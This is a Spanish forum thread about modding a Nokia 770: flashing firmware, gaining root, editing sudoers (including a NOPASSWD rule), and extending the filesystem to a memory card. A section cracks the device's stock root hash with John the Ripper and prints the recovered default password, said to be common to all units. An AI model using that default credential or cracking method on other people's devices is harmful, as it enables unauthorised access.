OESF Portables Forum
Everything Else => Europe User Groups => Zaurus Regional User Groups => Everything Else => Archived Forums => Spain => Topic started by: AXIM on December 30, 2006, 06:30:17 am
-
[span style=\'font-size:21pt;line-height:100%\']Flasheando la Nokia 770 desde Troppix & MacOS X [/span]
[img]http://www.hczim.de/software/pics/what-its-for.jpg\" border=\"0\" class=\"linked-image\" /] (http://www.hczim.de/software/mmc-unionfs.html)
flashear desde LinuX (TroppiX v_1.2 en mi ejemplo)
1º Apaga el N770, conecta al USB de ordenador
2º Arránca el N770, pulsa el botón de encendido+home
[div align=\"center\"](home=el boton de la casita)[/div]
* Veras el logotipo Nokia y un icono USB en la parte superior derecha de la pantalla, lo que indica que el N770 esta conectado correctamente
3º Abrir la KONSOLA -Eterm-, y tecleas, en Troppix ya entras como administrador (root@troppix:) y ya va todo seguido
# chmod +x flasher-3.0
# sudo ./flasher-3.0 -F SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM.bin -f -R
Nota; SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM.bin corresponde al último BIN hasta la fecha (actual) la versión 2006SE, cada versión usa un Flasher adaptado al Firmware a subir, en mi caso se renombro a v_3.0 por que ya disponía de la versión 2. en el "ROOT" directorio de archivos de Troppix.
Necesitas un linux y el flasheador 2.0 para OS-2006SE
http://maemo.org/downloads/d3.php?f=flasher-2.0 (http://maemo.org/downloads/d3.php?f=flasher-2.0)
Troppix, tiene "Nautilus" como explorador de archivos, clickás en iceWM (como inicio en Windows) y veras los HD, ROOT (directorio donde debes descargar o colocar el "BIN del Firmware de la N770 y el Flasher"
Despues simplemente ejecutar, como sigue...
[div align=\"center\"][img]http://img100.imageshack.us/img100/2424/flashincontroppix222222222222222222222222222sj1.jpg\" border=\"0\" class=\"linked-image\" /][/div]
Es recomendable que a la hora de subir una nueva Flash a tu N770 uses Linux, la Distribución que prefieras (hay cientos) pero del kernel posterior a la 2.6.15 Knoppix, B|T, SuSe, Mandriva... la que prefieras, y a ser posible que este instalada en HD no desde LiveCD, para evitar problemas.
El Flasheo desde Windows (es posible) es más lento, pesado e inseguro (de peores resultados), además en algunos casos "da" problemas de pantallazos (blancos) posteriores, desde Linux, apenas tardas 4/5 minutos.
[div align=\"center\"]¡Pierde el miedo a Linux! además tu N770 es un Linux![/div]
Troppix usa iceWM un entorno gráfico muy ligero que apenas ocupa espacio en HD (3 Gigas) de fácil Instalación
Descarga de Troppix 1.2:
http://www.idg.pl/ftp/pobierz/linux/941.html/ (http://www.idg.pl/ftp/pobierz/linux/941.html/)
Instala Troppix con XP:
http://www.seguridadwireless.net/foro/inde...topic,51.0.html (http://www.seguridadwireless.net/foro/index.php/topic,51.0.html)
Descarga Flasher para Linux PC
http://maemo.org/downloads/d3.php?f=flasher-2.0 (http://maemo.org/downloads/d3.php?f=flasher-2.0)
En Mac OSX es lo mismo que en Linux, exactamente los mismos comandos, pero yo lo hice con el Flasher.2.0
1- te bajas el http://www.maemo.org/downloads/d3.php?f=flasher-2.0.macosx (http://www.maemo.org/downloads/d3.php?f=flasher-2.0.macosx)
( flasher utility (MacOS X on PPC) for the Nokia 770 and for IT 2006 SE )
2- conectas el N770 apagado por USB
3- el flasher y el BIN lo pones en el directorio Macintos HD / Jordi ( en mi caso )
4- abres un Terminal y tecleas
sudo chmod +x flasher-2.0.macosx
( esto seria para darle permisos de ejecución al flash )
sudo ./flasher-2.0.macosx -F SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM.bin -f -R
enciendes el N770 apretando el icono de la casita durante 5 segundos y esperas que termine
[span style=\'font-size:21pt;line-height:100%\']Login como root & user y "Quitar Modo I+D"[/span]
[span style=\'font-size:21pt;line-height:100%\']EPILOGO[/span]
PREVIAMENTE se supone que ya hemos
-------------------------------------------------------------
1º Apaga el N770, conecta al USB de ordenador
2º Arránca el N770, pulsa el botón de encendido+home
(home=el boton de la casita)
* Veras el logotipo Nokia y un icono USB en la parte superior derecha de la pantalla => indica que el N770 esta conectado correctamente
3º Abrir la CONSOLA -Shell de cmd-, y tecleas, en Troppix (mi caso) ya entras como administrador (root@troppix:) y ya va todo seguido
# chmod +x flasher-2.0
# sudo ./flasher-2.0 -F SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM.bin -f -R
Ya podemos logearnos como
# sudo gainroot
[span style=\'font-size:9pt;line-height:100%\']ESTE METODO LO ACABO DE PROBAR Y FUNCIONA A 100%[/span]
1º Nos hacemos "root"
# sudo gainroot
2º Aplicamos una "passwd" al User (hasta ahora inhabilitado)
# passwd user
- nota; tecleamos por 2 veces la pass del user (¡ojo! no se vera lo tecleado pero si marcara)
3º un movimiento inteligente de cara a la seguridad es sumar el “usuario” a los sudoers:
# echo "user ALL = PASSWD: /bin/su" >> /etc/sudoers
4º Con este paso tu contraseña será pedida para convertirse en raíz.
# echo "user ALL = NOPASSWD: /bin/su" >> /etc/sudoers
5º Para conseguir permisos de super usuario a partir de ahora, y en adelante
Inicias sesión de Xterm, y escribes:
# sudo su -
IMPORTANTE; DEBES es aconsejable cambiar la pass de "root" antes de continuar ó tu N-770 sera vulnerable bajo una contraseña debil y atacable cuando andes cerca de "sniffer´s" maliciosos. ¡Que haberlos, haylos!
6º Para cambiar contraseña de la raíz (como usuario de la raíz):
# passwd
- nota; te pedira un minimo de 5 un maximo de 8 caracteres y te aconseja que mezcles números y letras para mayor segudidad, cuida y recuerda las mayusculas y minusculas así como la passwd nueva.
Te pedira la passwd 2 veces, despues sera tu nueva contraseña.
7º Para inhabilitar el login [clásico sudo su -]de "root" (es muy aconsejable) después de hayas logrado el acceso como "root" hacer lo siguiente:
# passwd -l root
A partir de ahora no accederas/n como usuario root a tu N770, ni desde SSH ni unos ni por otros medios locales (ganaras en seguridad).
Para logearse como root a partir de ahora, deberas de teclear:
# sudo su -
Se termino "sudo gainroot" y por supuesto, ya puedes quitar tú N770 del modo I+D RD, que según aconseja el mismo fabricante puede ser dañino a largo plazo para tu maquina.
[span style=\'font-size:25pt;line-height:100%\']PASO FINAL[/span]
DESACTIVAR Modo I+D (R&D MODE)
-------------------------------------------------------------------------------
Como antes:
1º Apaga el N770, conecta al USB de ordenador
2º Arránca el N770, pulsa el botón de encendido+home
(home=el boton de la casita)
* Veras el logotipo Nokia y un icono USB en la parte superior derecha de la pantalla, lo que indica que el N770 esta conectado correctamente
3º Desde terminal de linux-TROPPIX, teclea:
# chmod a+x flasher-2.0
# ./flasher-2.0 --disable-rd-mode --reboot
A partir de ahora para convertirnos en administrador:
# sudo su -
NOTA FINAL; (solo por curiosidad, te lo puedes ahorrar)
Vuelvo a copiar mi "file" de passwd
# cp /etc/passwd /media/mmc1
O leerlo simplemente desde mi Nokia 770 con una útilidad que me permita editar facilmente como; "leafpad"
[span style=\'font-size:9pt;line-height:100%\']LeafPad[/span]
Home Page: http://tarot.freeshell.org/leafpad/ (http://tarot.freeshell.org/leafpad/)
Port Contact: Etrunko
Screenshots: http://etrunko.blogspot.com/2006/08/leafpa...ext-editor.html (http://etrunko.blogspot.com/2006/08/leafpad-simple-text-editor.html)
Repository: http://www.maemo.org.br/platform/apt (http://www.maemo.org.br/platform/apt)
Distribution: mistral
Component: user
Y observo los cambios (del primer hilo) en el file "passwd" comparando la nueva pass de root (encriptada, ojo necesitariamos de John The Ripper (http://www.openwall.com/john/) u similar para verla en claro), así como el nuevo USER, habilitado, ya sin signos de "admiración" y en su sitio (Señor Smith ¡no funciona, su INDICACIÓN, ¡lo probé! ni hace falta colocarlo delante de root) cuando tenga un rato, ya leere, y pegare el resultante final
LES ACONSEJO QUE APLIQUEN LOS CAMBIOS
Y
DESHABILITEN SU MODO I+D RD
en sus cacharrines NOKIA 770
sin Renunciar a tener control de SuperUsuario y Pass de Usuario
osea, como en una distribución "mayor" de Linux
[span style=\'font-size:8pt;line-height:100%\']CAMBIOS FISICOS[/span]
# cp /etc/passwd /media/mmc1
El "passwd" ORIGINAL [sudo gainroot modo I+D] N770
root:SU.odxvRwp3Vs:0:0::/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:!:1009:121::/var/run/dbus:
user:!:29999:29999::/home/user:/bin/sh
systemui:!:30000:29999::/tmp:/bin/false
y el PASS final tras aplicar los comandos del post anterior:
root:GxTP0xBDdzZ8o:0:0::/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:!:100:1020::/var/run/dbus:
user:HxozyxPlxXUn.:29999:29999::/home/user:/bin/sh
systemui:!:30000:29999::/tmp:/bin/false
avahi:!:101:101:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Los cambios más significativos los encontramos en:
(I+D R&D) ;root:SU.odxvRwp3Vs:0:0::/root:/bin/sh
(su - ) ; root:GxTP0xBDdzZ8o:0:0::/root:/bin/sh
(I+D R&D) ;user:!:29999:29999::/home/user:/bin/sh
(su - ) ; user:HxozyxPlxXUn.:29999:29999::/home/user:/bin/sh
* login; user
* pass; HxozyxPlxXUn (encriptada)
Desaparece el "!" inaugurando el "user" o activandolo para que nos entendamos
Una nueva linea en (su - )
avahi:!:101:101:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
[span style=\'font-size:8pt;line-height:100%\']DESTAPANDO LA PASS "CIFRADA" con John The Ripper[/span]
1º Tomando el "passwd" de origen, común a todas nuestras N770, con login: root
pass "cifrada" SU.odxvRwp3Vs
¡Vamos a probar un experimento! a destapar esa SU.odxvRwp3Vs
root:SU.odxvRwp3Vs:0:0::/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:!:1009:121::/var/run/dbus:
user:!:29999:29999::/home/user:/bin/sh
systemui:!:30000:29999::/tmp:/bin/false
Descarga John The Ripper para Windows;
http://www.openwall.com/john/e/john171w.zip (http://www.openwall.com/john/e/john171w.zip)
Esta versión opera desde la consola de DOS
Los passwords en sistemas UNIX generalmente se encuentran en el archivo
/etc/passwd (nuestra N770 tambien guarda en este directorio sus pass)
cLick en inicio, ejecutar y hay "cmd" (ventana de DOS)
Se nos abre la ventana negra de MS2 y buscamos la ruta dode tengamos descargado el John The Ripper
D:\john1701\run>john-mmx
ejecutando john-mmx veo las opciones del Ripper
John the Ripper password cracker, version 1.7.0.1
Copyright (c) 1996-2006 by Solar Designer and others
Homepage: http://www.openwall.com/john/
Usage: john-mmx [OPTIONS] [PASSWORD-FILES]
--single "single crack" mode
--wordlist=FILE --stdin wordlist mode, read words from FILE or stdin
--rules enable word mangling rules for wordlist mode
--incremental[=MODE] "incremental" mode [using section MODE]
--external=MODE external mode or word filter
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
--session=NAME give a new session the NAME
--status[=NAME] print status of a session [called NAME]
--make-charset=FILE make a charset, FILE will be overwritten
--show show cracked passwords
--test perform a benchmark
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..] load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] load users with[out] this (these) shell(s) only
--salts=[-]COUNT load salts with[out] at least COUNT passwords only
--format=NAME force ciphertext format NAME: DES/BSDI/MD5/BF/AFS/LM
--save-memory=LEVEL enable memory saving, at LEVEL 1..3
Para atacar al passwd genuino del OS2006 de la N770 lo extraigo en la misma carpeta del John The Ripper y ejecuto el comando;
# john-mmx --incremental passwd
Que me destapa; SU.odxvRwp3Vs pass del root
Loaded 1 password hash (Traditional DES [64/64 BS MMX])
[span style=\'font-size:9pt;line-height:100%\']rootme (root)[/span]
guesses: 1 time: 0:00:01:46 c/s: 503647 trying: rogbsi - rootms
¿Alguien que tenga su "psswd" sin hacer "sudo gainroot" puede probar el login?
Es decir abre XTerminal, y teclea sudo root, colocando de seguido por dos veces, la pass destapada:
[span style=\'font-size:8pt;line-height:100%\']rootme[/span]
¿Funcionara en I+D sin hacer sudo gainroot?
No lo se, la verdad, lo que si se, es que Ripper ha destapado con exito mis pass en "root" y "user" con el comando:
# john-mmx --wordlist=password.lst passwd --rules
Loaded 2 password hashes with 2 different salts (Traditional DES [64/64 BS MMX])
[span style=\'font-size:9pt;line-height:100%\']cara (user)
conejo (root)[/span]
guesses: 2 time: 0:00:00:00 100% c/s: 19200 trying: golf - boomer
[span style=\'font-size:9pt;line-height:100%\']Este truco os puede servir para recuperar las pass, si algún día las perdeis[/span]
Ya me contara alguno, si funciona ese "rootme" ni que contar la importancía de ser el "pass" puesto que es común a todas las maquinas (creo) no haría falta entrar en modo I+D R&D y se podría pasar de una tacada al paso descrito más arriba:
[span style=\'font-size:8pt;line-height:100%\']resumen[/span]
1º Nos hacemos "root" (solo que sin sudo gainroot) con rootme (2 veces) tras petición de "login"
# sudo root
2º crear user; passwd user
3º echo "user ALL = PASSWD: /bin/su" >> /etc/sudoers
4º echo "user ALL = NOPASSWD: /bin/su" >> /etc/sudoers
5º sudo su -
6º passwd
7º passwd -l root
8º login como superusuario; sudo su -
Las descripciones y pasos detallados en el post por encima de este...
-
[span style=\'font-size:9pt;line-height:100%\'] Aumentar la memoria interna
extendiendo el “Sistema de Archivos Raiz” [/span](root) a la tarjeta de memoria RS-MMC
[span style=\'font-size:9pt;line-height:100%\']Para tener acceso una partición (ext2-) en IT2006 (SU-18_2006SE_1.2006.26-8_PR_F5_MR0_ARM), hay que añadir el módulo del núcleo para ext2 primero, después montas:[/span]
insmod /mnt/initfs/lib/modules/current/ext2.ko
mount /dev/mmcblk0p2 /media/mmc2
Instrucciones detalladas de cómo aumentar en Nokia 770 extendiendo el “filesystem de root” a la tarjeta de memoria RS-MMC.
[span style=\'font-size:9pt;line-height:100%\']Ventajas de Extender la memoria de N770 [/span]
Poder utilizar el espacio libre en tu tarjeta de memoria para el “filesystem de root” ¡Se acabo el limite de 62 megas de memoria interna!. Y Poder instalar más programas y datos.
Aun después de reflashear la unidad (tras una actualización de Sistema Operativo), no perderás tus datos ¡ya que! programas y datos quedan almacenados en la tarjeta de memoria, Falsear el dispositivo N770 no causará pérdida de los datos. Con la ventaja de poder restaurar tu configuración personal después de un flasheao “en un minuto.
Además de que la memoria interna correra mas ligera de carga de trabajo, alargando la vida (hard) útil del N770. La Flash de memoría del "gachet" Nokia de 64, trabajara mucho menos, dejando el trabajo a la RS-MMC externa. ¡Esa es la idea!
La nueva maquina de Nokia, la 870, dispondra de 128 megas de Flash interna, tú con una tarjeta de 1 ó 2 Gigas, podras dotar del limite que precises, yo opino que lo ideal es 256 megas, con estas medidas ¡NO ENVIDIARAS LA NUEVA VERSIÓN NOKIA MAEMO"
[span style=\'font-size:9pt;line-height:100%\']Requisitos[/span]:
1 tarjeta de memoria, por supuesto, la incluida en el Nokia 770 es de 64Mb solamente -es un poco pequeño-, se recomienda una tarjeta más grande [1 GB en Fnac de Leganes me la compre por menos de 20 $]
¡El nuevo paquete del instalador ahora incluye software para particionar y para ajustar el formato de la tarjeta así que puedes hacer todo desde el Nokia 770!
Necesitas el acceso como SuperUsuario y una Consola [xterm] en tu dispositivo N770.
[span style=\'font-size:9pt;line-height:100%\'] Descripción de lo que vamos a hacer: [/span]
El objetivo a lograr es intercambiar algunas partes del “sistema de archivos de root” fuera de la memoria interna (64 Mb) enviándolo a la tarjeta de memoria.
Esto es posible gracias a “enlaces simbólicos” (accesos directos que se llaman en entornos Windows) desde la memoria interna a los archivos “reales” que residen en la tarjeta de memoria.
Para preservar las cualidades requeridas del “Sistema de Archivos”, necesitamos utilizar un Sistema de Archivos de Linux (Ext2).
Tenemos formatear la tarjeta de memoria y repartir su espacio físico, que se puede hacer con las utilidades incluidas. Antes de comenzar:
[span style=\'font-size:25pt;line-height:100%\']AVISO;[/span] realizar un ¡Backup de datos!, y ten por tú propia cuentao que todo lo que hagas será bajo tu propia responsabilidad y riesgo!
Primer paso - preparación de la tarjeta de memoria:
Crear un “filesystem de Linux” (Ext3) en la tarjeta de memoria, si no no trabajará. Para compatibilizar con la disposición original del sistema operativo, la tarjeta de memoria debe también soportar VFAT (FAT16)
Una “primera” partición parecerá y se comportará una tarjeta de memoria normal (VFAT)
• Se “montara o desmontara” según se conecte/desconecta la conexión del USB.
Una “segunda” partición (Ext3) trabajará independientemente de la primera (VFAT) y se convertirá en una extensión a la memoria interna, desde la que podremos mover y enlazar (Enlaces Simbólicos o Accesos Directos) los archivos que deseados.
Para formatear y repartir la tarjeta de memoria, debera estar insertada dentro del Slot del Nokia 770
# No se debe conectar el USB.
Antes de que continúes, hay que desmontar [unmount] la tarjeta de memoria, si estuviera montada.
Abrir un xterm (terminal de Extras->X), logearse como superusuario (sudo gainroot desde nodo I+D) y desmontar [unmount] la tarjeta
# umount /media/mmc1.
Entonces utilizar el particionador de disco
# /var/lib/install/sbin/cfdisk /dev/mmcblk0
Y ajustar el tamaño la partición inicial de VFAT y crear una partición nueva de Linux ext3 en el espacio libre del N770.
Para hacer la partición, necesitamos usar el cfdisk dado con el volframio (thank you Wolfram Ravenwolf)
.deb: /var/lib/install/sbin/cfdisk /dev/mmcblk0
1º Suprimir la partición existente! (simplemente Press “D”)
2º Crear la 1ª partición para el almacenaje de datos (del misma modo que en tu MMC original ha estado trabajando, debe ser una partición FAT16). para hacer esa presiona “N”. - no olvides indicar el tipo de partición, presiona “T”); es el número 06
3º bootable (si?) presionando “B”
4º Crea la 2ª partición, usada para la swap. (Press “N”) - crea una partición del linux. (Número 83). El tamaño se selecciona al gusto de cada uno (es primaria)
IMPORTANTE; no olvidar escribir la tabla de la partición al MMC: ¡el uso escribe (la Press W, no w (minúscula), sino W (mayúscula) entonces confirma “sí”)
¡ahora, ya puedes parar y ajustar a formato los nuevos volúmenes creados!
# mkfs.vfat /dev/mmcblk0p1
Después es necesario “reiniciar el sitema”
# shutdown -r now
Volver a logearse como super usuario (sudo gainroot)
# /var/lib/install/sbin/mkfs.ext3 /dev/mmcblk0p2
Con esto ya tienes tu MMC en dos particiones. (1ª en VFAT/FAT16, y 2ª en Ext3)
Un dato como ejemplo; En una tarjeta de 512 Mb la 1ª partición (FAT16 ó VFAT) con 384MB (con los datos principales memoria, conectada “Enlaces Simbólicos” al Sistema de Archivos principal al conectar a través del USB), y la 2ª partición (Ext3) con el resto (aproximadamente 129MB) para intercambiar datos, en una de 1 Giga o 2 Gigas, crearla al gusto
* Entonces proceder a ajustar a formato la partición
# mkfs.vfat /dev/mmcblk0p1
La partición creada recientemente no estará disponible en el Nokia 770 hasta después de un reboot. /reinicio
Apagar y encender no será suficiente probablemente. La manera más fiable será con el comando del reboot desde xterm.
# shutdown -r now
En bootup del sistema, el archivo especial
# /dev/mmcblk0p2
del n770 en modo bloque será creado para la partición nueva, sólo después debes ajustar el formato de a partición de Linux
# /var/lib/install/sbin/mkfs.ext3 /dev/mmcblk0p2
y proceder al segundo paso.
En lugar de hacerlo manualmente, recomiendan usar el Script shell que lo hará automáticamente:
# /var/lib/install/sbin/extrootfs
**************************************************************
Segundo paso – Auto-montaje de la tarjeta de memoria:
Ahora que la partición de la tarjeta de memoria segunda se puede alcanzar con
# /dev/mmcblk0p2
Tendremos que instalar montando el arranque de sistema y desmontarlo en parada normal del sistema. (es decir como operaba antes el N770)
Para corregir los Script del arranque y parada. aquí están 5 comandos desde xterm que instalarán (cada comando está en una sola línea):
# cp -p /etc/fstab /etc/fstab~ && echo /dev/mmcblk0p2 /Root ext3 defaults,errors=remount-ro,noatime 0 0 >>/etc/fstab
# cp -p /etc/init.d/minircS /etc/init.d/minircS~ && sed -ir 's|(/sbin/udevstart)$|\1;mount /dev/mmcblk0p2|' /etc/init.d/minircS
# cp -p /etc/init.d/minireboot /etc/init.d/minireboot~ && sed -ir 's|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|' /etc/init.d/minireboot
# cp -p /etc/init.d/minishutdown /etc/init.d/minishutdown~ && sed -ir 's|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|' /etc/init.d/minishutdown
# mkdir -p /Root && mount /dev/mmcblk0p2
Continuara...???
[span style=\'font-size:9pt;line-height:100%\']ENLACES;[/span]
http://maemo.org/maemowiki/ExtendedRootFilesystem
http://www.internettablettalk.com/forums/showpost.php?p=9365&postcount=42
http://n770.bitacoras.com/archivos/2006/03/24/como-extender-el-sistema-de-archivos
http://gregarius.dropcode.net/demo/feed.php?channel=12&iid=6585&y=2006&m=03&d=24
Abrimos X-terminal (Extras-> X-terminal).
Nos hacemos superusuario (sudo gainrrot).
Desmontamos la rs-mmc (umount /media/mmc1).
Arrancamos la aplicación de formateo (/var/lib/install/sbin/cfdisk /dev/mmcblk0):
Borramos la partición actual (Presiona D + Enter)
Creamos una nueva con N
Especificamos cuando espacio queremos que ocupe (por ejemplo 800 Mb)
Ahora con la letra T, definimos el formato FAT16 (06)
Hacemos que sea arrancable (Bootable en ingles), presionando B
Pulsamos la flecha hacia abajo del cursor, y veremos el espacio libre que queda
Crearemos la segunda partición, otra vez con N, esta ya esta preparada por que se crea como partición Linux (tipo 83)
Si ya hemos terminado en el teclado virtual, pulsamos W y contestamos yes
Nos salimos de Cfdisk con Q
Formateamos la particion VFAT con mkfs.vfat /dev/mmcblk0p1
Para que sea visible al 770, la segunda partición reiniciamos el sistema
pero de esta forma shutdown -r now
Una vez que haya reiniciado, abrimos X-terminal, sudo gainroot y /var/lib/install/sbin/mkfs.ext3
/dev/mmcblk0p2
Y ya estan las 2 particiones formateadas y 100 x 100 funcionales
[span style=\'font-size:9pt;line-height:100%\']LOS COMANDOS EMPLEADOS[/span]
sudo gainroot
umount /media/mmc1
/var/lib/install/sbin/cfdisk /dev/mmcblk0
mkfs.vfat /dev/mmcblk0p1
shutdown -r now
sudo gainroot
/var/lib/install/sbin/mkfs.ext3 /dev/mmcblk0p2
/var/lib/install/sbin/extrootfs
Despues de todo esto estamos listos para aplicar el script que el amigo Wolfram,ha hecho para la comunidad del Nokia 770
# cp -p /etc/fstab /etc/fstab~ && echo /dev/mmcblk0p2 /Root ext3 defaults,errors=remount-ro,noatime 0 0 >>/etc/fstab
# cp -p /etc/init.d/minircS /etc/init.d/minircS~ && sed -ir 's|(/sbin/udevstart)$|\1;mount /dev/mmcblk0p2|' /etc/init.d/minircS
# cp -p /etc/init.d/minireboot /etc/init.d/minireboot~ && sed -ir 's|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|' /etc/init.d/minireboot
# cp -p /etc/init.d/minishutdown /etc/init.d/minishutdown~ && sed -ir 's|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|' /etc/init.d/minishutdown
# mkdir -p /Root && mount /dev/mmcblk0p2
http://serendipity.ravenwolf.de/
Otra vez en X-terminal y despues de sudo gainroot , escribimos /var/lib/install/sbin/extrootfs y pulsamos Intro
[span style=\'font-size:8pt;line-height:100%\']Funcionamiento del Filesystem Fixups [/span]
El Script siguiente en un archivo y ejecuta el “Sistema de Archivos”.
Crea un número de “enlaces simbólicos” de modo que todos los “binarios” ahora estén en el “path” (la ruta), las “lib paths” serán actualizados y algunos archivos que queden “sin casar” se enlazaran a la localización más apropiada.
El “fixup” automático # /dev/mmcblk0p2 (como Sistema de Archivos Ext2) en /MMC, si existe.
Cada prueba fixup determina si ha sido ya `fijado', y aplica solamente el fixup en caso de necesidad, así que puede ser ejecutado en distintos momentos sin problemas
[span style=\'font-size:9pt;line-height:100%\']El Script;[/span]
#!/bin/sh
MMC_Mount=/MMC
MMC_Device=/dev/mmcblk0p2
#
# test if user is root / exit if not
#
if [ `id -u` != 0 ]; then
echo $0: only root can do that && exit
fi
#
# MMC automount code
#
if [ ! -e $MMC_Mount -a -b MMC_Device ]; then
echo “creating $MMC_Mount mountpoint and automounting $MMC_Device”
cd /
echo $0: save | tee -a $MMC.log
cp -p /etc/fstab /etc/fstab.baseline
echo /dev/mmcblk0p2 $MMC ext2 defaults,noatime 0 0 >>/etc/fstab
cp -p /etc/init.d/minircS /etc/init.d/minircS.baseline
sed -ir ’s|(/sbin/udevstart)$|1;mount /dev/mmcblk0p2|’ /etc/init.d/minircS
cp -p /etc/init.d/minireboot /etc/init.d/minireboot.baseline
sed -ir ’s|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|’ /etc/init.d/minireboot
cp -p /etc/init.d/minishutdown /etc/init.d/minishutdown.baseline
sed -ir ’s|(/media/mmc1)|/dev/mmcblk0p1 /dev/mmcblk0p2|’ /etc/init.d/minishutdown
mkdir -p $MMC && mount /dev/mmcblk0p2
else
echo “either $MMC_Mount already exists or $MMC_Device does not exist - bypassing automount scripts”
fi
#
# linking the install directories into the path
#
if [ ! -d /usr/local ]; then
echo “/usr/local does not appear to exist - creating”
mkdir /usr/local
else
echo “/usr/local appears to exist”
fi
#
if [ ! -h /usr/local/bin ]; then
echo “/usr/local/bin symbolic link does not appear to exist - creating”
ln -s /var/lib/install/usr/bin /usr/local/bin
else
echo “/usr/local/bin symbolic link appears to exist”
fi
#
if [ ! -h /usr/local/sbin ]; then
echo “/usr/local/sbin symbolic link does not appear to exist - creating”
ln -s /var/lib/install/usr/sbin /usr/local/sbin
else
echo “/usr/local/sbin symbolic link appears to exist”
fi
#
if [ ! -h /usr/local/lib ]; then
echo “/usr/local/lib symbolic link does not appear to exist - creating”
ln -s /var/lib/install/usr/lib /usr/local/lib
echo “refreshing lib cache”
ldconfig
else
echo “/usr/local/lib symbolic link appears to exist”
fi
#
# Linking the MMC and / directories into the File Manager
#
if [ ! -h /home/user/MyDocs/Root ]; then
echo “/home/user/MyDocs/Root symbolic link does not appear to exist - creating”
ln -s / /home/user/MyDocs/Root
else
echo “/home/user/MyDocs/Root symbolic link appears to exist”
fi
#
if [ ! -h /home/user/MyDocs/MMC ]; then
echo “/home/user/MyDocs/MMC symbolic link does not appear to exist - creating”
ln -s /MMC /home/user/MyDocs/MMC
else
echo “/home/user/MyDocs/MMC symbolic link appears to exist”
fi
#
# Fixing up slocate
#
if [ ! -d /var/lib/slocate ]; then
echo “/var/lib/slocate does not appear to exist - creating”
mkdir /var/lib/slocate
groupadd slocate
usermod -G slocate user
else
echo “/var/lib/slocate appears to exist”
fi
#
# Fixing up dpkg
#
if [ ! -h /var/lib/dpkg ]; then
echo “/var/lib/dpkg symbolic link does not appear to exist - creating”
ln -s /var/lib/install/var/lib/dpkg /var/lib/dpkg
else
echo “/var/lib/dpkg symbolic link appears to exist”
fi
#
# Fixing up OpenSSH application links
#
if [ ! -h /var/lib/install/usr/bin/scp ]; then
echo “/var/lib/install/usr/bin/scp symbolic link does not appear to exist - creating”
ln -s /var/lib/install/bin/scp /var/lib/install/usr/bin/scp
else
echo “/var/lib/install/usr/bin/scp symbolic link appears to exist”
fi
#
if [ ! -h /var/lib/install/usr/bin/ssh ]; then
echo “/var/lib/install/usr/bin/ssh symbolic link does not appear to exist - creating”
ln -s /var/lib/install/bin/ssh /var/lib/install/usr/bin/ssh
else
echo “/var/lib/install/usr/bin/ssh symbolic link appears to exist”
fi
#
if [ ! -h /var/lib/install/usr/bin/skey ]; then
echo “/var/lib/install/usr/bin/skey symbolic link does not appear to exist - creating”
ln -s /var/lib/install/bin/skey /var/lib/install/usr/bin/skey
else
